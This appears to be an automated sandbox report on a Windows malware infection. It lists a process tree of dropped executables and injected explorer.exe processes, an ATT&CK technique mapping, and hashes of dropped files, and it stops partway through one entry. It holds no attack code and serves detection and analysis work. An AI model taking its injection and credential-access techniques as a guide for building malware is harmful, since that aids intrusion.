                                                                                      • Suspicious behavior: EnumeratesProcesses
                                                                                      • Suspicious use of AdjustPrivilegeToken
                                                                                      • Suspicious use of WriteProcessMemory
                                                                                      PID:1272
                                                                                      • C:\Windows\system32\svchost.exe
                                                                                        C:\Windows\system32\svchost.exe -k SystemNetworkService
                                                                                        2⤵
                                                                                        • Drops file in System32 directory
                                                                                        • Checks processor information in registry
                                                                                        • Modifies data under HKEY_USERS
                                                                                        • Modifies registry class
                                                                                        PID:1328
                                                                                    • C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe
                                                                                      "C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe" -ServerName:MicrosoftEdge.AppXdnhjhccw3zf0j06tkg3jtqr00qdm0khc.mca
                                                                                      1⤵
                                                                                      • Drops file in Windows directory
                                                                                      • Modifies Internet Explorer settings
                                                                                      • Modifies registry class
                                                                                      • Suspicious use of SetWindowsHookEx
                                                                                      PID:4688
                                                                                    • C:\Windows\system32\browser_broker.exe
                                                                                      C:\Windows\system32\browser_broker.exe -Embedding
                                                                                      1⤵
                                                                                      • Modifies Internet Explorer settings
                                                                                      PID:4820
                                                                                    • C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
                                                                                      "C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
                                                                                      1⤵
                                                                                      • Modifies registry class
                                                                                      • Suspicious use of SetWindowsHookEx
                                                                                      PID:4752
                                                                                    • C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
                                                                                      "C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
                                                                                      1⤵
                                                                                      • Modifies registry class
                                                                                      PID:5224
                                                                                    • C:\Windows\system32\werfault.exe
                                                                                      werfault.exe /h /shared Global\34861ccc293e4999b9e601552c7f8b02 /t 5628 /p 5224
                                                                                      1⤵
                                                                                        PID:5616
                                                                                      • C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
                                                                                        "C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
                                                                                        1⤵
                                                                                        • Suspicious use of WriteProcessMemory
                                                                                        PID:4924
                                                                                      • C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
                                                                                        "C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
                                                                                        1⤵
                                                                                        • Modifies registry class
                                                                                        PID:4736
                                                                                      • C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
                                                                                        "C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
                                                                                        1⤵
                                                                                        • Executes dropped EXE
                                                                                        • Checks processor information in registry
                                                                                        PID:4908
                                                                                      • \??\c:\windows\system32\svchost.exe
                                                                                        c:\windows\system32\svchost.exe -k netsvcs -s seclogon
                                                                                        1⤵
                                                                                        • Suspicious use of NtCreateUserProcessOtherParentProcess
                                                                                        PID:5712
                                                                                      • C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
                                                                                        "C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
                                                                                        1⤵
                                                                                        • Modifies Internet Explorer settings
                                                                                        • Modifies registry class
                                                                                        PID:4900
                                                                                      • C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
                                                                                        "C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
                                                                                        1⤵
                                                                                        • Modifies registry class
                                                                                        PID:6016
                                                                                      • C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
                                                                                        "C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
                                                                                        1⤵
                                                                                        • Modifies registry class
                                                                                        PID:5640
                                                                                      • C:\Users\Admin\AppData\Local\Temp\6B97.exe
                                                                                        C:\Users\Admin\AppData\Local\Temp\6B97.exe
                                                                                        1⤵
                                                                                        • Executes dropped EXE
                                                                                        PID:5176
                                                                                        • C:\Users\Admin\AppData\Roaming\IrfanViewStreamer\IVStreamer.exe
                                                                                          C:\Users\Admin\AppData\Roaming\IrfanViewStreamer\IVStreamer.exe
                                                                                          2⤵
                                                                                          • Executes dropped EXE
                                                                                          • Loads dropped DLL
                                                                                          PID:6100
                                                                                      • C:\Users\Admin\AppData\Local\Temp\7675.exe
                                                                                        C:\Users\Admin\AppData\Local\Temp\7675.exe
                                                                                        1⤵
                                                                                        • Executes dropped EXE
                                                                                        PID:5080
                                                                                      • C:\Users\Admin\AppData\Local\Temp\7935.exe
                                                                                        C:\Users\Admin\AppData\Local\Temp\7935.exe
                                                                                        1⤵
                                                                                        • Executes dropped EXE
                                                                                        PID:5004
                                                                                      • C:\Users\Admin\AppData\Local\Temp\8665.exe
                                                                                        C:\Users\Admin\AppData\Local\Temp\8665.exe
                                                                                        1⤵
                                                                                        • Executes dropped EXE
                                                                                        PID:5780
                                                                                        • C:\Users\Admin\AppData\Roaming\RegWorkshop\RegWorkshop.exe
                                                                                          C:\Users\Admin\AppData\Roaming\RegWorkshop\RegWorkshop.exe
                                                                                          2⤵
                                                                                          • Executes dropped EXE
                                                                                          • Loads dropped DLL
                                                                                          • Suspicious use of SetWindowsHookEx
                                                                                          PID:4320
                                                                                      • C:\Users\Admin\AppData\Local\Temp\8F9E.exe
                                                                                        C:\Users\Admin\AppData\Local\Temp\8F9E.exe
                                                                                        1⤵
                                                                                        • Executes dropped EXE
                                                                                        PID:5688
                                                                                      • C:\Users\Admin\AppData\Local\Temp\9329.exe
                                                                                        C:\Users\Admin\AppData\Local\Temp\9329.exe
                                                                                        1⤵
                                                                                        • Executes dropped EXE
                                                                                        • Suspicious use of SetThreadContext
                                                                                        PID:5264
                                                                                        • C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe
                                                                                          C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe
                                                                                          2⤵
                                                                                            PID:4528
                                                                                        • C:\Users\Admin\AppData\Local\Temp\9A00.exe
                                                                                          C:\Users\Admin\AppData\Local\Temp\9A00.exe
                                                                                          1⤵
                                                                                          • Executes dropped EXE
                                                                                          • Loads dropped DLL
                                                                                          PID:4828
                                                                                        • C:\Windows\SysWOW64\explorer.exe
                                                                                          C:\Windows\SysWOW64\explorer.exe
                                                                                          1⤵
                                                                                            PID:5052
                                                                                          • C:\Windows\explorer.exe
                                                                                            C:\Windows\explorer.exe
                                                                                            1⤵
                                                                                              PID:2020
                                                                                            • C:\Windows\SysWOW64\explorer.exe
                                                                                              C:\Windows\SysWOW64\explorer.exe
                                                                                              1⤵
                                                                                              • Modifies registry class
                                                                                              PID:4908
                                                                                            • C:\Windows\explorer.exe
                                                                                              C:\Windows\explorer.exe
                                                                                              1⤵
                                                                                              • Suspicious behavior: MapViewOfSection
                                                                                              PID:5624
                                                                                            • C:\Windows\SysWOW64\explorer.exe
                                                                                              C:\Windows\SysWOW64\explorer.exe
                                                                                              1⤵
                                                                                                PID:196
                                                                                              • C:\Windows\explorer.exe
                                                                                                C:\Windows\explorer.exe
                                                                                                1⤵
                                                                                                • Suspicious behavior: MapViewOfSection
                                                                                                PID:1008
                                                                                              • C:\Windows\SysWOW64\explorer.exe
                                                                                                C:\Windows\SysWOW64\explorer.exe
                                                                                                1⤵
                                                                                                  PID:5628
                                                                                                • C:\Windows\explorer.exe
                                                                                                  C:\Windows\explorer.exe
                                                                                                  1⤵
                                                                                                  • Suspicious behavior: MapViewOfSection
                                                                                                  PID:5760
                                                                                                • C:\Windows\SysWOW64\explorer.exe
                                                                                                  C:\Windows\SysWOW64\explorer.exe
                                                                                                  1⤵
                                                                                                    PID:6088
                                                                                                  • \??\c:\windows\system32\svchost.exe
                                                                                                    c:\windows\system32\svchost.exe -k localsystemnetworkrestricted -s fhsvc
                                                                                                    1⤵
                                                                                                      PID:4464
                                                                                                    • C:\Windows\system32\svchost.exe
                                                                                                      C:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -s WPDBusEnum
                                                                                                      1⤵
                                                                                                        PID:4952
                                                                                                      • C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe
                                                                                                        "C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe" -ServerName:MicrosoftEdge.AppXdnhjhccw3zf0j06tkg3jtqr00qdm0khc.mca
                                                                                                        1⤵
                                                                                                        • Drops file in Windows directory
                                                                                                        • Modifies registry class
                                                                                                        • Suspicious use of SetWindowsHookEx
                                                                                                        PID:5764
                                                                                                      • C:\Windows\system32\browser_broker.exe
                                                                                                        C:\Windows\system32\browser_broker.exe -Embedding
                                                                                                        1⤵
                                                                                                          PID:4372
                                                                                                        • C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
                                                                                                          "C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
                                                                                                          1⤵
                                                                                                          • Modifies registry class
                                                                                                          • Suspicious behavior: MapViewOfSection
                                                                                                          • Suspicious use of SetWindowsHookEx
                                                                                                          PID:5904
                                                                                                        • C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
                                                                                                          "C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
                                                                                                          1⤵
                                                                                                          • Modifies registry class
                                                                                                          PID:5888

                                                                                                        Network

                                                                                                        MITRE ATT&CK Matrix ATT&CK v6

                                                                                                        Persistence

                                                                                                        Registry Run Keys / Startup Folder

                                                                                                        1
                                                                                                        T1060

                                                                                                        BITS Jobs

                                                                                                        1
                                                                                                        T1197

                                                                                                        Defense Evasion

                                                                                                        Modify Registry

                                                                                                        3
                                                                                                        T1112

                                                                                                        BITS Jobs

                                                                                                        1
                                                                                                        T1197

                                                                                                        Install Root Certificate

                                                                                                        1
                                                                                                        T1130

                                                                                                        Credential Access

                                                                                                        Credentials in Files

                                                                                                        4
                                                                                                        T1081

                                                                                                        Discovery

                                                                                                        Software Discovery

                                                                                                        1
                                                                                                        T1518

                                                                                                        Query Registry

                                                                                                        4
                                                                                                        T1012

                                                                                                        System Information Discovery

                                                                                                        5
                                                                                                        T1082

                                                                                                        Security Software Discovery

                                                                                                        1
                                                                                                        T1063

                                                                                                        Peripheral Device Discovery

                                                                                                        1
                                                                                                        T1120

                                                                                                        Remote System Discovery

                                                                                                        1
                                                                                                        T1018

                                                                                                        Collection

                                                                                                        Data from Local System

                                                                                                        4
                                                                                                        T1005

                                                                                                        Command and Control

                                                                                                        Web Service

                                                                                                        1
                                                                                                        T1102

                                                                                                        Replay Monitor

                                                                                                        Loading Replay Monitor...

                                                                                                        Downloads

                                                                                                        • C:\Program Files (x86)\UltraMediaBurner\UltraMediaBurner.exe
                                                                                                          MD5

                                                                                                          7124be0b78b9f4976a9f78aaeaed893a

                                                                                                          SHA1

                                                                                                          804f3e4b3f9131be5337b706d5a9ea6fcfa53e25

                                                                                                          SHA256

                                                                                                          bb28d7beea6e3faa641f69b9b4866858d87ca63f9eef15dae350b2dc28b537c3

                                                                                                          SHA512

                                                                                                          49f6df2ee5af4032ca47b01beb08648c7235a2dea51546aab8fc14d5f0ae7baa53cc539f24ea21d6db67882b4e65c8d271630fb8e12144cf24f6e8a4e598dff3

                                                                                                        • C:\Program Files (x86)\UltraMediaBurner\UltraMediaBurner.exe
                                                                                                          MD5

                                                                                                          7124be0b78b9f4976a9f78aaeaed893a

                                                                                                          SHA1

                                                                                                          804f3e4b3f9131be5337b706d5a9ea6fcfa53e25

                                                                                                          SHA256

                                                                                                          bb28d7beea6e3faa641f69b9b4866858d87ca63f9eef15dae350b2dc28b537c3

                                                                                                          SHA512

                                                                                                          49f6df2ee5af4032ca47b01beb08648c7235a2dea51546aab8fc14d5f0ae7baa53cc539f24ea21d6db67882b4e65c8d271630fb8e12144cf24f6e8a4e598dff3

                                                                                                        • C:\Program Files\install.dat
                                                                                                          MD5

                                                                                                          806c3221a013fec9530762750556c332

                                                                                                          SHA1

                                                                                                          36475bcfd0a18555d7c0413d007bbe80f7d321b5

                                                                                                          SHA256

                                                                                                          9bcecc5fb84d21db673c81a7ed1d10b28686b8261f79136f748ab7bbad7752f7

                                                                                                          SHA512

                                                                                                          56bbaafe7b0883f4e5dcff00ae69339a3b81ac8ba90b304aeab3e4e7e7523b568fd9b269241fc38a39f74894084f1f252a91c22b79cc0a16f9e135859a13145e

                                                                                                        • C:\Program Files\install.dat
                                                                                                          MD5

                                                                                                          31e4a5735b20be6a53cbb552663b1cc3

                                                                                                          SHA1

                                                                                                          c080a61b65a34928a1fb1899db8a3698a4892a4c

                                                                                                          SHA256

                                                                                                          b28936c7d89e33fdc4eace2d0e92ed7d3b02bbfc5e7c8297d16f721d0254305f

                                                                                                          SHA512

                                                                                                          3e98a84f11ca1eb27e894ce6ac7c6ff6c37382459a467ef30a87bfe36149960c5c76f2beeb9415ab3287f002012e65c4f754dcd17045986306c6afab399a0604

                                                                                                        • C:\Program Files\install.dll
                                                                                                          MD5

                                                                                                          fe60ddbeab6e50c4f490ddf56b52057c

                                                                                                          SHA1

                                                                                                          6a71fdf73761a1192fd9c6961f66754a63d6db17

                                                                                                          SHA256

                                                                                                          9fcfa73600ff1b588015ffa20779cec6714e48ee6ae15db8766f7ffd5ee3031d

                                                                                                          SHA512

                                                                                                          0113b47ba1a33a2f597a26c9b66435483373cde4edb183e0e92abef8ed003743f426ba5ffe25a5807c030cc14d8a95d73aa6af95a85f44a86dd40264ecb96536

                                                                                                        • C:\Program Files\install.dll
                                                                                                          MD5

                                                                                                          fe60ddbeab6e50c4f490ddf56b52057c

                                                                                                          SHA1

                                                                                                          6a71fdf73761a1192fd9c6961f66754a63d6db17

                                                                                                          SHA256

                                                                                                          9fcfa73600ff1b588015ffa20779cec6714e48ee6ae15db8766f7ffd5ee3031d

                                                                                                          SHA512

                                                                                                          0113b47ba1a33a2f597a26c9b66435483373cde4edb183e0e92abef8ed003743f426ba5ffe25a5807c030cc14d8a95d73aa6af95a85f44a86dd40264ecb96536

                                                                                                        • C:\Program Files\libEGL.dll
                                                                                                          MD5

                                                                                                          cc0f81a657d6887e246f49151e60123d

                                                                                                          SHA1

                                                                                                          1eb31528501c375817853e09d95b7152858c5b31

                                                                                                          SHA256

                                                                                                          31fd8f7d1ab67c7b4f332d2d4518b99d2bb344ac577044b44551cd7e6f58dbbb

                                                                                                          SHA512

                                                                                                          8ad3af4b0fef41dc20965429fd4dbb699131e92277f14c8af5882970fd192820c0f0e1a8369dbc8471fcb09fe778fb708c57dfdfcacd14cd6e84a238fcc84198

                                                                                                        • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\07CEF2F654E3ED6050FFC9B6EB844250_3431D4C539FB2CFCB781821E9902850D
                                                                                                          MD5

                                                                                                          4c8fe6b2f96e01a5a6d418a7f1c843a7

                                                                                                          SHA1

                                                                                                          51842e81863c205e888bffe034a3abbf642c5419

                                                                                                          SHA256

                                                                                                          e6272d58a61f01f31f18f7b4ecc85232a1e71be4b9e93570395ad825e5ca6afa

                                                                                                          SHA512

                                                                                                          209986a1b77f039dac3c4e51a7c2a54af77b47261373e4f97290c8de21511dc181549ce656585c546ef616922aef5ee88f9d3cc98ae98e2b426dd4072688824a

                                                                                                        • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\5EE9003E3DC4134E8CF26DC55FD926FA
                                                                                                          MD5

                                                                                                          3caa69cfe89abfd90bdce40ad5b137b7

                                                                                                          SHA1

                                                                                                          ae6fc20857170e4edeca2abb966b17390040a20b

                                                                                                          SHA256

                                                                                                          c834c22efe48ce7949fb75a0dd3447b6b7cd5fc75e8633b111fc49e34cc454bf

                                                                                                          SHA512

                                                                                                          548165bba3fdcadb8b1906e0570b3de4e17eb62298d54beda7b406d0e5723e78023c3c998c2152a18b0625869433b416604f4c515d7cedf935ebd2995b946e12

                                                                                                        • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\B2FAF7692FD9FFBD64EDE317E42334BA_D7393C8F62BDE4D4CB606228BC7A711E
                                                                                                          MD5

                                                                                                          60f6b2c801a2a958b06c893b74b19282

                                                                                                          SHA1

                                                                                                          da0e286f2d50cc4f731f3fcec60de23069faf17f

                                                                                                          SHA256

                                                                                                          593de34d0c7012a797f118d197186c85f0bd1fd4d3a70fa84e3ea89f9f980032

                                                                                                          SHA512

                                                                                                          406ca703da00617705fbe0c5b9f6be656fffd3f43a8f68e6ccff78e24e5ef8b024f3f2dd1a28d63888abab10aacdab3a78bce0f2656e08b373e4ef8b0717833d

                                                                                                        • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\07CEF2F654E3ED6050FFC9B6EB844250_3431D4C539FB2CFCB781821E9902850D
                                                                                                          MD5

                                                                                                          ce5c449fc8d6985100ffc72673be247a

                                                                                                          SHA1

                                                                                                          6db8bc6ff4f8e78d586e49b5c072451f639fa81b

                                                                                                          SHA256

                                                                                                          c2e9f4f1d707a98bdd88df595df6bfc08086b451766a4ba35985ca123d6ac536

                                                                                                          SHA512

                                                                                                          e741bf0d3c35b6da1bef359fef045dcc1b15b9e72ab2ac48335c9369b1bfffd9e91f09f9f608654d31bae73041a828a9f13a8ea99ffe14a7f8d9e9fe1fb81837

                                                                                                        • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\5EE9003E3DC4134E8CF26DC55FD926FA
                                                                                                          MD5

                                                                                                          41a640eefa56d26f90cf9ac79eb5183f

                                                                                                          SHA1

                                                                                                          1cf4b94d643284ece320c89af6eef980a8fd056a

                                                                                                          SHA256

                                                                                                          16b3236bf293e842446833cb81906fceda81674f53a18fbbddab55f0e89a0a68

                                                                                                          SHA512

                                                                                                          b0d4fab4b71ab7d66c979c0d06aaf373596ba1a3c1f38e49a02b8e6277ce52da7941538be18d7a1b07a64a53aba987ab10022d02460df24171c230bc3bcbf11d

                                                                                                        • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\B2FAF7692FD9FFBD64EDE317E42334BA_D7393C8F62BDE4D4CB606228BC7A711E
                                                                                                          MD5

                                                                                                          6d92c50e50783d02982be4e6d00c08a9

                                                                                                          SHA1

                                                                                                          a3d077c6f20af907209f06f32e1997616f6496c6

                                                                                                          SHA256

                                                                                                          db53547ad4ae4f83bc25a3dcdac385da07982769070c37801923ddf2403700b3

                                                                                                          SHA512

                                                                                                          02b7c89aec78e38823302a459170a2afe6f995e0f9257972fcabab7934af58bd380abe68da4c03d77688c76cc9f30ce0bafffb93a01715ce86ceb7b4c6d3b314

                                                                                                        • C:\Users\Admin\AppData\Local\Temp\2asmxt2q.uwi\c7ae36fa.exe
                                                                                                          MD5

                                                                                                          f1fff660cc1fe85b4450287536cb5c63

                                                                                                          SHA1

                                                                                                          548182d57f8b144960b49976484d448a5ef22585

                                                                                                          SHA256

                                                                                                          d83058edfb4ff969ae3ab1f9adcbd79c032388e1382f5a7063745fa6055f1c36

                                                                                                          SHA512

                                                                                                          0e6182a3585045033c4646ed28f65046ed85baafb1b4a94e6a8bc748da0ba5e14c3e8428467fa226f96c667f7ff7bc58b1c08296d1f0bef24183df711a3492bd

                                                                                                        • C:\Users\Admin\AppData\Local\Temp\2asmxt2q.uwi\c7ae36fa.exe
                                                                                                          MD5

                                                                                                          f1fff660cc1fe85b4450287536cb5c63

                                                                                                          SHA1

                                                                                                          548182d57f8b144960b49976484d448a5ef22585

                                                                                                          SHA256

                                                                                                          d83058edfb4ff969ae3ab1f9adcbd79c032388e1382f5a7063745fa6055f1c36

                                                                                                          SHA512

                                                                                                          0e6182a3585045033c4646ed28f65046ed85baafb1b4a94e6a8bc748da0ba5e14c3e8428467fa226f96c667f7ff7bc58b1c08296d1f0bef24183df711a3492bd

                                                                                                        • C:\Users\Admin\AppData\Local\Temp\3mndjjmg.zxd\y1.exe
                                                                                                          MD5

                                                                                                          211704d0d7c978042c9fd858fd7a3256

                                                                                                          SHA1

                                                                                                          ed582bf85c777e03990562af0ca5d3503646e462

                                                                                                          SHA256

                                                                                                          98105987364d21e0167d6b6a90510a9beea0746eca7a3326c13c11806ffced79

                                                                                                          SHA512

                                                                                                          a25778cfe12b106e73b2a410276c0fe7b999501abfe2bb4c51d60992691f2d540797c05fcdcd653580f499e3042a32e73d4881a294ba599299b344f58e56ee11

                                                                                                        • C:\Users\Admin\AppData\Local\Temp\3mndjjmg.zxd\y1.exe
                                                                                                          MD5

                                                                                                          211704d0d7c978042c9fd858fd7a3256

                                                                                                          SHA1

                                                                                                          ed582bf85c777e03990562af0ca5d3503646e462

                                                                                                          SHA256

                                                                                                          98105987364d21e0167d6b6a90510a9beea0746eca7a3326c13c11806ffced79

                                                                                                          SHA512

                                                                                                          a25778cfe12b106e73b2a410276c0fe7b999501abfe2bb4c51d60992691f2d540797c05fcdcd653580f499e3042a32e73d4881a294ba599299b344f58e56ee11

                                                                                                        • C:\Users\Admin\AppData\Local\Temp\5cqkt0us.b5w\instEU.exe
                                                                                                          MD5

                                                                                                          bdb62dc3502ea91f26181fa451bd0878

                                                                                                          SHA1

                                                                                                          bff5609cd44209ee1f07920b2103757792866d7a

                                                                                                          SHA256

                                                                                                          6b1dc06f68c7971c2dab6e0d01ed1691b3a400490cd2a1d6ce88c307d7566a3c

                                                                                                          SHA512

                                                                                                          12d94ef15f12268a2c849c18c06319b5796be4c11ffaa81c6a2e6356674842f075509acb08749219076a99e99179e2594541abe86e0c50e380b11fcc55375e5d

                                                                                                        • C:\Users\Admin\AppData\Local\Temp\5cqkt0us.b5w\instEU.exe
                                                                                                          MD5

                                                                                                          bdb62dc3502ea91f26181fa451bd0878

                                                                                                          SHA1

                                                                                                          bff5609cd44209ee1f07920b2103757792866d7a

                                                                                                          SHA256

                                                                                                          6b1dc06f68c7971c2dab6e0d01ed1691b3a400490cd2a1d6ce88c307d7566a3c

                                                                                                          SHA512

                                                                                                          12d94ef15f12268a2c849c18c06319b5796be4c11ffaa81c6a2e6356674842f075509acb08749219076a99e99179e2594541abe86e0c50e380b11fcc55375e5d

                                                                                                        • C:\Users\Admin\AppData\Local\Temp\7c-2bedb-890-134bd-61e34acd61714\Gutitaejyjo.exe
                                                                                                          MD5

                                                                                                          18e49540637bccc9b3a7ca3d48cae223

                                                                                                          SHA1

                                                                                                          b5b5b9c981420929faa959c0ddf6831dfde6e9a6

                                                                                                          SHA256

                                                                                                          698471c960eaa5c2a1b439ac307ff96a5735680e3220d1d5e1fc75aa33c8a55b

                                                                                                          SHA512

                                                                                                          a33cc44d211c29442ed5ce61ff70b5469468853099f16209f3895d5b688349a72069044bee07d9d9dbe8339ff60d13d7b7df103ce1113ed1a34a78f04e68415e

                                                                                                        • C:\Users\Admin\AppData\Local\Temp\7c-2bedb-890-134bd-61e34acd61714\Gutitaejyjo.exe
                                                                                                          MD5

                                                                                                          18e49540637bccc9b3a7ca3d48cae223

                                                                                                          SHA1

                                                                                                          b5b5b9c981420929faa959c0ddf6831dfde6e9a6

                                                                                                          SHA256

                                                                                                          698471c960eaa5c2a1b439ac307ff96a5735680e3220d1d5e1fc75aa33c8a55b

                                                                                                          SHA512

                                                                                                          a33cc44d211c29442ed5ce61ff70b5469468853099f16209f3895d5b688349a72069044bee07d9d9dbe8339ff60d13d7b7df103ce1113ed1a34a78f04e68415e

                                                                                                        • C:\Users\Admin\AppData\Local\Temp\7c-2bedb-890-134bd-61e34acd61714\Gutitaejyjo.exe.config
                                                                                                          MD5

                                                                                                          98d2687aec923f98c37f7cda8de0eb19

                                                                                                          SHA1

                                                                                                          f6dcfcdcfe570340ecdbbd9e2a61f3cb4f281ba7

                                                                                                          SHA256

                                                                                                          8a94163256a722ef8cc140bcd115a5b8f8725c04fe158b129d47be81cb693465

                                                                                                          SHA512

                                                                                                          95c7290d59749df8df495e04789c1793265e0f34e0d091df5c0d4aefe1af4c8ac1f5460f1f198fc28c4c8c900827b8f22e2851957bbaea5914ea962b3a1d0590

                                                                                                        • C:\Users\Admin\AppData\Local\Temp\JNSLEPQZHL\ultramediaburner.exe
                                                                                                          MD5

                                                                                                          6103ca066cd5345ec41feaf1a0fdadaf

                                                                                                          SHA1

                                                                                                          938acc555933ee4887629048be4b11df76bb8de8

                                                                                                          SHA256

                                                                                                          b8d950bf6fa228454571f15cc4b7b6fbaa539f1284e43946abd90934db925201

                                                                                                          SHA512

                                                                                                          a9062e1fac2f6073a134d9756c84f70999240e36a98cb39684018e7d5bd3772f2ca21ab35bd2c6bd60413eb7306376e7f530e78ce4ebcfe256f766e8c42d16b3

                                                                                                        • C:\Users\Admin\AppData\Local\Temp\JNSLEPQZHL\ultramediaburner.exe
                                                                                                          MD5

                                                                                                          6103ca066cd5345ec41feaf1a0fdadaf

                                                                                                          SHA1

                                                                                                          938acc555933ee4887629048be4b11df76bb8de8

                                                                                                          SHA256

                                                                                                          b8d950bf6fa228454571f15cc4b7b6fbaa539f1284e43946abd90934db925201

                                                                                                          SHA512

                                                                                                          a9062e1fac2f6073a134d9756c84f70999240e36a98cb39684018e7d5bd3772f2ca21ab35bd2c6bd60413eb7306376e7f530e78ce4ebcfe256f766e8c42d16b3

                                                                                                        • C:\Users\Admin\AppData\Local\Temp\RarSFX0\Install.exe
                                                                                                          MD5

                                                                                                          41a5f4fd1ea7cac4aa94a87aebccfef0

                                                                                                          SHA1

                                                                                                          0d0abf079413a4c773754bf4fda338dc5b9a8ddc

                                                                                                          SHA256

                                                                                                          97e95e99fd499ec45a7c1d8683d5731ce5e7a8fb8b710622e578cd169a00d8d9

                                                                                                          SHA512

                                                                                                          5ca14bda498f26efff4e1179969b8f2c25244063c7bf25f3ec20b5cd24b5be320bbfb8b3d0b2d66f5c5b415da777a766fece5f251a4247773c6cb991417fb75f

                                                                                                        • C:\Users\Admin\AppData\Local\Temp\RarSFX0\Install.exe
                                                                                                          MD5

                                                                                                          41a5f4fd1ea7cac4aa94a87aebccfef0

                                                                                                          SHA1

                                                                                                          0d0abf079413a4c773754bf4fda338dc5b9a8ddc

                                                                                                          SHA256

                                                                                                          97e95e99fd499ec45a7c1d8683d5731ce5e7a8fb8b710622e578cd169a00d8d9

                                                                                                          SHA512

                                                                                                          5ca14bda498f26efff4e1179969b8f2c25244063c7bf25f3ec20b5cd24b5be320bbfb8b3d0b2d66f5c5b415da777a766fece5f251a4247773c6cb991417fb75f

                                                                                                        • C:\Users\Admin\AppData\Local\Temp\RarSFX0\JoSetp.exe
                                                                                                          MD5

                                                                                                          3b1b318df4d314a35dce9e8fd89e5121

                                                                                                          SHA1

                                                                                                          55b0f8d56212a74bda0fc5f8cc0632ef52a4bc71

                                                                                                          SHA256

                                                                                                          4df9e7fcd10900ae5def897377f54856b0ddad1798fa22614eba56096940885b

                                                                                                          SHA512

                                                                                                          f04faca320d344378dd31bf05556fb3ac02873e46e2140d5858162e739f5c25bc9b32d619587c84c36b768b9193ea5292d63f62bb0b8458b35d65959b52df6b4

                                                                                                        • C:\Users\Admin\AppData\Local\Temp\RarSFX0\JoSetp.exe
                                                                                                          MD5

                                                                                                          3b1b318df4d314a35dce9e8fd89e5121

                                                                                                          SHA1

                                                                                                          55b0f8d56212a74bda0fc5f8cc0632ef52a4bc71

                                                                                                          SHA256

                                                                                                          4df9e7fcd10900ae5def897377f54856b0ddad1798fa22614eba56096940885b

                                                                                                          SHA512

                                                                                                          f04faca320d344378dd31bf05556fb3ac02873e46e2140d5858162e739f5c25bc9b32d619587c84c36b768b9193ea5292d63f62bb0b8458b35d65959b52df6b4

                                                                                                        • C:\Users\Admin\AppData\Local\Temp\RarSFX0\filee.exe
                                                                                                          MD5

                                                                                                          3bc84c0e8831842f2ae263789217245d

                                                                                                          SHA1

                                                                                                          d60b174c7f8372036da1eb0a955200b1bb244387

                                                                                                          SHA256

                                                                                                          757e7c2569cc52c9e1639fbca06e957cb40f775d5cb1a8aafa670131b62b0824

                                                                                                          SHA512

